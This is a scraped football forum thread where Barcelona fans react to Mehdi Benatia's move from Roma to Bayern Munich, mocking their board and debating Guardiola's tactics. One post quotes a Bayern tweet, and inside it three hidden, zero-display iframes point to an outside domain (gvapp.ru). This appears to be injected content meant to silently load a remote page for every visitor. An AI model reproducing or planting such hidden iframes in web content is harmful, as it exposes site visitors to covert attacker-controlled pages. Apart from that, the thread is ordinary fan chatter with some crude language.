Mehdi Benatia

Luftstalag14

Culé de Celestial Empire
Sad he didin't come to Barca. Why didn't Zubi came after him now when is priced dropped ? I would have gone for him even if Mathieu and Thomas are already bought. I'm a bit satisfied he ended up in Bayern rather than in rm, Chelshit or other impossible clubs...

The price only dropped because Bayern is the only one pursuing him and the timing. If we had jumped into the fray neither club would have landed him for 30m, I suspect.

R

Ryu Hayabusa

It'll be killed by good teams if Pep pulls the same system he used against BVB in the super cup

He used the same system to great effect in the German Cup final last season against the BVB. That time, players were in full traning and had something to play for.

___Alaba______Lahm___
__Badst_Benatia_Boa___

might work out great.

Sid90

Reading from all the whining on this forum seems this guy is a god masquerading as a man. Anyways our agent PEP :pep:will destroy Bayern inside out when thats his Primary Mission Protocol.

Last edited:
F

Flavia

FC Bayern English @FCBayernEN · 31 seg
DONE DEAL: <s>#</s>FCBayern and <s>@</s>OfficialASRoma have agreed the transfer of MEHDI BENATIA (27)! Defensive ace set to sign a 5-year contract.<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

They sign Benatia, and we'll sign douglas on the same day. So freaking funny and sad :lol:

raskolnikov

Someone needs to ask Zubi to explain this or ask if he had brain damage. Socios are to blame as well since they apperantly dont mind al the mistakes the board made and how the reputation of barca have been tarnished.

Blaugrana Bull

HiiiPoWeR
:facepalm:

We should not blame Vermaelen though. It is not his fault the club went for him. I hope he recovers well and stays injury free with us.
And let's see what Benatia can really offer at the highest level. I think he will be pretty good at Bayern.

Catorce

Cruijff's Heir
Let me just do this, I really need to:

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA

We are idiots. This board can just stay and do whatever the fuck they want. Benatia, wish you the best being coached by the best manager in the world.

Home of Barca Fans